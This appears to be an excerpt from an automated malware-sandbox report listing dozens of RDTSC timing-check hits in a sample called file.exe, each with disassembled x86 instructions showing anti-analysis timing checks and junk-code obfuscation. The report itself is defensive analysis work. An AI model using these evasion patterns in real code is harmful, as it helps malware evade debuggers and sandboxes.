              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3500F5 second address: 350106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FE90543D6B6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351DCD second address: 351DD7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE9047A81CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351DD7 second address: 351E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FE90543D6B8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007FE90543D6B8h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f xor dword ptr [ebp+122D2507h], edi 0x00000045 push 00000000h 0x00000047 pushad 0x00000048 mov ax, 842Ah 0x0000004c cmc 0x0000004d popad 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FE90543D6C3h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351E4A second address: 351E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3528B4 second address: 3528B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3528B8 second address: 3528C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE9047A81C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3532DC second address: 3532FA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE90543D6B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE90543D6BFh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 353BE5 second address: 353BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 353BE9 second address: 353BF3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE90543D6B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3545A9 second address: 3545B3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9047A81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 353BF3 second address: 353BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357932 second address: 35793C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9047A81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3545B3 second address: 3545BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE90543D6B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 353BF9 second address: 353BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 353BFD second address: 353C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357ED8 second address: 357EDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357EDE second address: 357EEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357EEC second address: 357EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 358F6F second address: 358F86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 358F86 second address: 358F90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FE9047A81C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35817C second address: 358193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 js 00007FE90543D6B8h 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359021 second address: 359025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35AE6D second address: 35AE86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE90543D6C5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35AE86 second address: 35AE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35AE8A second address: 35AEA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FE90543D6BCh 0x00000011 jnl 00007FE90543D6B6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35AEA1 second address: 35AEA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3591EB second address: 3591F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35AEA7 second address: 35AF03 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE9047A81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FE9047A81C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add edi, dword ptr [ebp+122D1DBFh] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FE9047A81C8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 push 00000000h 0x0000004b adc ebx, 5F037083h 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 pushad 0x00000056 popad 0x00000057 pop esi 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35AF03 second address: 35AF2F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE90543D6CCh 0x00000008 jmp 00007FE90543D6C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jng 00007FE90543D6C0h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A0A5 second address: 35A128 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE9047A81C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FE9047A81C8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FE9047A81C8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d add ebx, dword ptr [ebp+122D286Fh] 0x00000053 mov eax, dword ptr [ebp+122D14B5h] 0x00000059 or dword ptr [ebp+122D24EBh], esi 0x0000005f push FFFFFFFFh 0x00000061 mov bx, 78E6h 0x00000065 nop 0x00000066 jbe 00007FE9047A81D4h 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A128 second address: 35A12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A12C second address: 35A142 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE9047A81CDh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35BFD7 second address: 35BFDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35A142 second address: 35A148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35B092 second address: 35B097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CF6D second address: 35CF73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CF73 second address: 35CF8F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE90543D6BFh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CF8F second address: 35CF95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CF95 second address: 35CF9A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CF9A second address: 35CFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2680h], eax 0x0000000e push 00000000h 0x00000010 mov di, B07Ah 0x00000014 mov dword ptr [ebp+122D2638h], edx 0x0000001a push 00000000h 0x0000001c mov di, cx 0x0000001f mov dword ptr [ebp+122D1A05h], ecx 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CFC4 second address: 35CFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35B097 second address: 35B161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FE9047A81D7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007FE9047A81D6h 0x00000015 jmp 00007FE9047A81D8h 0x0000001a pop ebx 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007FE9047A81C8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007FE9047A81C8h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 0000001Dh 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d mov eax, dword ptr [ebp+122D1619h] 0x00000063 mov edi, dword ptr [ebp+122D1890h] 0x00000069 push FFFFFFFFh 0x0000006b mov edi, dword ptr [ebp+122D298Bh] 0x00000071 nop 0x00000072 jmp 00007FE9047A81CFh 0x00000077 push eax 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35B161 second address: 35B165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35F0E6 second address: 35F0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jns 00007FE9047A81C6h 0x0000000f jne 00007FE9047A81C6h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35D11B second address: 35D11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35D11F second address: 35D123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35E1BB second address: 35E1BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3602A1 second address: 3602A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361234 second address: 361285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007FE90543D6C7h 0x0000000c nop 0x0000000d mov edi, 6DABA375h 0x00000012 push 00000000h 0x00000014 jmp 00007FE90543D6C9h 0x00000019 push 00000000h 0x0000001b mov edi, dword ptr [ebp+122D2AB7h] 0x00000021 xchg eax, esi 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jno 00007FE90543D6B6h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361285 second address: 361289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361289 second address: 36129D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE90543D6BAh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36129D second address: 3612A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE9047A81C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3621F8 second address: 3621FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3621FD second address: 362215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FE9047A81C6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364294 second address: 3642F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007FE90543D6B6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov bx, 06CEh 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FE90543D6B8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f jnl 00007FE90543D6B6h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007FE90543D6B8h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 xchg eax, esi 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 pop eax 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3642F0 second address: 364317 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9047A81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE9047A81D5h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364317 second address: 36431D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3671F4 second address: 36721E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9047A81CAh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3613A7 second address: 361406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 mov ebx, dword ptr [ebp+122D33C1h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FE90543D6B8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 add bx, B000h 0x0000003b mov eax, dword ptr [ebp+122D150Dh] 0x00000041 push esi 0x00000042 and edi, 75607033h 0x00000048 pop edi 0x00000049 push FFFFFFFFh 0x0000004b or edi, 20B75AF3h 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 jns 00007FE90543D6B8h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 363402 second address: 363498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push esi 0x00000007 jl 00007FE9047A81CCh 0x0000000d pop esi 0x0000000e nop 0x0000000f movsx edi, cx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FE9047A81C8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov bh, 8Eh 0x00000035 xor edi, dword ptr [ebp+122D24F8h] 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007FE9047A81C8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 0000001Ch 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c clc 0x0000005d mov eax, dword ptr [ebp+122D02C1h] 0x00000063 sub dword ptr [ebp+122D2680h], eax 0x00000069 push FFFFFFFFh 0x0000006b xor edi, 003DEA54h 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jne 00007FE9047A81C8h 0x0000007a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364535 second address: 364539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 367371 second address: 367375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 367375 second address: 36737B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36737B second address: 3673A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9047A81CBh 0x00000008 jns 00007FE9047A81C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push edx 0x00000014 ja 00007FE9047A81C6h 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 367491 second address: 36749A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36749A second address: 36749E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E86A second address: 36E873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E873 second address: 36E887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9047A81D0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37363D second address: 37366B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FE90543D6BAh 0x0000000e jmp 00007FE90543D6C9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 375E70 second address: 375E75 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 375F61 second address: 375F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 375F66 second address: 375F97 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE9047A81C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jnl 00007FE9047A81D2h 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 375F97 second address: 375F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 376066 second address: 37606C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37AD0F second address: 37AD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007FE90543D6B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37AD1F second address: 37AD2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE9047A81C6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37AD2A second address: 37AD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE90543D6B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 305C17 second address: 305C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE9047A81D7h 0x0000000e rdtsc
